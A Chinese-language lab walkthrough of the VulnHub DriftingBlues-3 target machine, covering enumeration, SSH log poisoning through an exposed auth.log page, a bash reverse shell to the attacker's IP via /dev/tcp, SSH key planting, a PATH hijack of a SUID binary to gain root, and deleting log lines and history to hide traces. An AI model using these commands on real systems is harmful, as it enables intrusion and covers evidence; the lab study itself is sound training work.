vulnhub靶场【DriftingBlues】之3

前言

靶机:DriftingBlues-3,IP地址192.168.1.60

攻击:kali,IP地址192.168.1.16

都采用虚拟机,网卡为桥接模式

主机发现

使用arp-scan -lnetdiscover -r 192.168.1.1/24

信息收集

使用nmap扫描端口

网站探测

访问80端口,并查看页面源码,发现有图片等信息,可能是网站型目录

使用gobuster、dirsearch、ffuf、dirb、dirbuster等工具扫描目录

shell 复制代码
gobuster dir -u http://192.168.1.60 -w /usr/share/wordlists/dirb/big.txt -x php,zip,md,txt,html,jpg -b 404 -d

访问robots.txt,发现eventadmins/目录

访问drual、phpmyadmin、privacy,发现都是信息ABCABCD

访问secret

访问wp-admin

访问eventadmins/目录

翻译一下,发现/littlequeenofspades.html页面

访问/eventadmins

漏洞寻找

查看页面源代码,发现编码aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

解码这个

访问/adminsfixit.php,发现是ssh连接的认证日志,通过测试发现确实会记录ssh登录时的用户名、地址和端口

shell 复制代码
ssh test@192.168.1.60

尝试连接,修改ssh连接时的用户为php脚本,测试是否可以

访问页面

测试是否可行

漏洞利用

尝试使用bash命令反弹

shell 复制代码
bash -c 'bash -i >& /dev/tcp/192.168.1.16/9999 0>&1'
进行URL编码
bash+-i+>%26+%2fdev%2ftcp%2f192.168.1.16%2f9999+0>%261%0a

kali中开启监听,然后使用浏览器执行上面的反弹命令

靶机内信息收集

使用find寻找具有SUID权限和capabilites

shell 复制代码
find / -perm -4000 -print 2>/dev/null
find / -type f -executable 2>/dev/null | xagrs getcap -r 2>/dev/null

查看定时任务

shell 复制代码
cat /etc/crontab

查看网络状态信息

查看备份文件夹,看有无信息

使用find寻找其他用户具有可写权限

shell 复制代码
find /home -perm /2 2>/dev/null
-perm /2   是指其他用户具有可写权限,/2是指写权限

查看这个目录,发现具有写权限

提权

提权至robertj

kali生成ssh的公私钥

然后把公钥id_rsa.pub上传到这个目录下,改名为authorized_keys

然后使用ssh私钥连接

之前使用find寻找具有SUID权限文件,发现getinfo,在linux中并无该命令,测试该命令

把这个文件下载到kali

shell 复制代码
scp robertj@192.168.1.60:/usr/bin/getinfo ./

使用strings命令查看

提权至root

那么可以使用export设置临时变量的优先目录,最好在/tmp目录

编写脚本提权

shell 复制代码
echo "/bin/bash" > ip

查看flag

清除痕迹

清理日志

shell 复制代码
sed -i "/192.168.1.16/d" auth.log

删除之前生成的公钥

清除命令历史记录

总结

  1. 主要考证日志文件的利用,这里就是利用验证登录日志auth.log通过adminsfixit.php文件展露
  2. 然后就是考察ssh公私钥的使用
  3. 考察临时环境变量的优先级目录
相关推荐
听雨入夜1 天前
CMake构建学习笔记-libxml库的构建
笔记·学习
9624561 天前
跨域与私有网络访问限制排查实录
运维·服务器·网络
发量惊人的中年网工1 天前
SD-WAN如何赋能工业物联网?打造工厂网络远程连接和数据传输新方案
运维·网络·分布式·物联网
Chengbei111 天前
云存储桶漏洞检测工具OSS-2.0更新,全类型文件解析,存储桶遍历 + 敏感排查一站式完成渗透取证
网络·安全·web安全·网络安全·xss
乐维_lwops1 天前
乐维社区“专家坐诊”第403期问答
运维·网络·监控系统·答疑·lerwee运维智能体
不在逃避q1 天前
一步一步学习使用LiveBindings()TListView进阶使用(),打造天气预报程序
服务器·数据库·学习
小王C语言1 天前
虚拟机开机过程中关机,再次开机没有分配 IP
linux·网络·tcp/ip
知识分享小能手1 天前
高等数学学习教程,从入门到精通,微分中值定理与导数的应用(5)
学习·机器学习·概率论
零零信安1 天前
暗网监测技术实践(一):威胁源采集与反爬对抗——基于《暗网情报技术能力框架》的双生态视角
网络·数据泄露·零零信安
520拼好饭被践踏1 天前
JAVA+Agent学习day25
java·开发语言·学习